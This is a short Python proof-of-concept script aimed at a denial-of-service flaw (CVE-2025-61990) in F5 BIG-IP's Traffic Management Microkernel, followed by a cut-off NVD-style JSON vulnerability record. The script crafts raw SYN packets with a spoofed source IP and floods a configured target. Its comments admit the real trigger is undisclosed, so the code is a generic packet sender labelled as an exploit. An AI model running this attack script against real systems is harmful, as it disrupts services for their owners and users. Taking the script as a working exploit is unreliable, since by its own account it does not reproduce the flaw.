CVE-2025-61990

# CVE-2025-61990 - F5 BIG-IP TMM DoS PoC (Conceptual) # Vulnerability: TMM termination on multi-bladed platforms via undisclosed traffic # CVSS: 7.5 (HIGH) | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H # Affected: F5 BIG-IP multi-bladed hardware platforms (VIPRION series) # # Note: This is a conceptual PoC. The exact triggering traffic pattern # has not been publicly disclosed by F5. Researchers need to perform # fuzzing or reverse engineering to identify the specific packet # characteristics that trigger TMM termination. import socket import struct import random import time TARGET_HOST = "192.168.1.100" # F5 BIG-IP VIPRION management/data IP TARGET_PORT = 443 # Target service port (e.g., HTTPS virtual server) PACKET_COUNT = 1000 # Number of crafted packets to send DELAY = 0.01 # Delay between packets (seconds) def craft_malicious_packet(): """ Craft a network packet designed to trigger TMM abnormal termination. The exact triggering pattern is undisclosed; this demonstrates a generic approach using malformed/edge-case traffic patterns. """ # TCP SYN with unusual options or fragment patterns # may trigger edge-case handling in TMM src_port = random.randint(1024, 65535) seq_num = random.randint(0, 4294967295) ack_num = 0 # TCP header with crafted flags/options data_offset = 5 # 20 bytes header flags = 0x02 # SYN flag window = 65535 tcp_header = struct.pack('!HHIIBBHHH', src_port, TARGET_PORT, seq_num, ack_num, (data_offset << 4), flags, window, 0, 0) # IP header ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, 0, # Version/IHL, TOS 40 + len(tcp_header), # Total length random.randint(0, 65535), # ID 0x4000, # Flags (Don't Fragment) 64, # TTL 6, # Protocol (TCP) 0, # Checksum (calculated by OS) socket.inet_aton('10.0.0.1'), # Source IP (spoofed) socket.inet_aton(TARGET_HOST) # Destination IP ) return ip_header + tcp_header def send_exploit_traffic(): """ Send crafted traffic to trigger TMM termination on multi-bladed platform. """ print(f"[*] Targeting F5 BIG-IP at {TARGET_HOST}:{TARGET_PORT}") print(f"[*] Sending {PACKET_COUNT} crafted packets...") sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) for i in range(PACKET_COUNT): try: packet = craft_malicious_packet() sock.sendto(packet, (TARGET_HOST, 0)) if i % 100 == 0: print(f"[+] Sent {i}/{PACKET_COUNT} packets") time.sleep(DELAY) except Exception as e: print(f"[-] Error sending packet {i}: {e}") print("[*] Exploit traffic sent. Check target TMM status.") sock.close() if __name__ == "__main__": send_exploit_traffic()

{"cve": {"id": "CVE-2025-61990", "sourceIdentifier": "[email protected]", "published": "2025-10-15T16:15:35.993", "lastModified": "2025-10-21T12:12:24.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When using a multi-bladed platform with more than one blade, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "6538FBFE-AE3F-41DC-BE48-8A2444DE1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "8CDAF78A-6C2B-4640-93DD-524A0D9D80CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "4BEC05AA-EB63-4A34-94E8-81606329BA75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "F3007970-0661-4CAC-91A6-363396ED3B41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "2450DC77-B46C-4886-AC9A-CF78B1EC4F06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "D8BC9B56-DC91-4312-9A37-0892E1DCC97D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_automation_toolchain:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "B5C25C2C-608A-432F-B49C-CED71150801C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "96D77245-3641-49B9-BC32-472D460E5C1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_container_ingress_services:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "37AF1DFD-AE86-4F64-9941-75FAA0186ED8"}, {"vuln ... (truncated)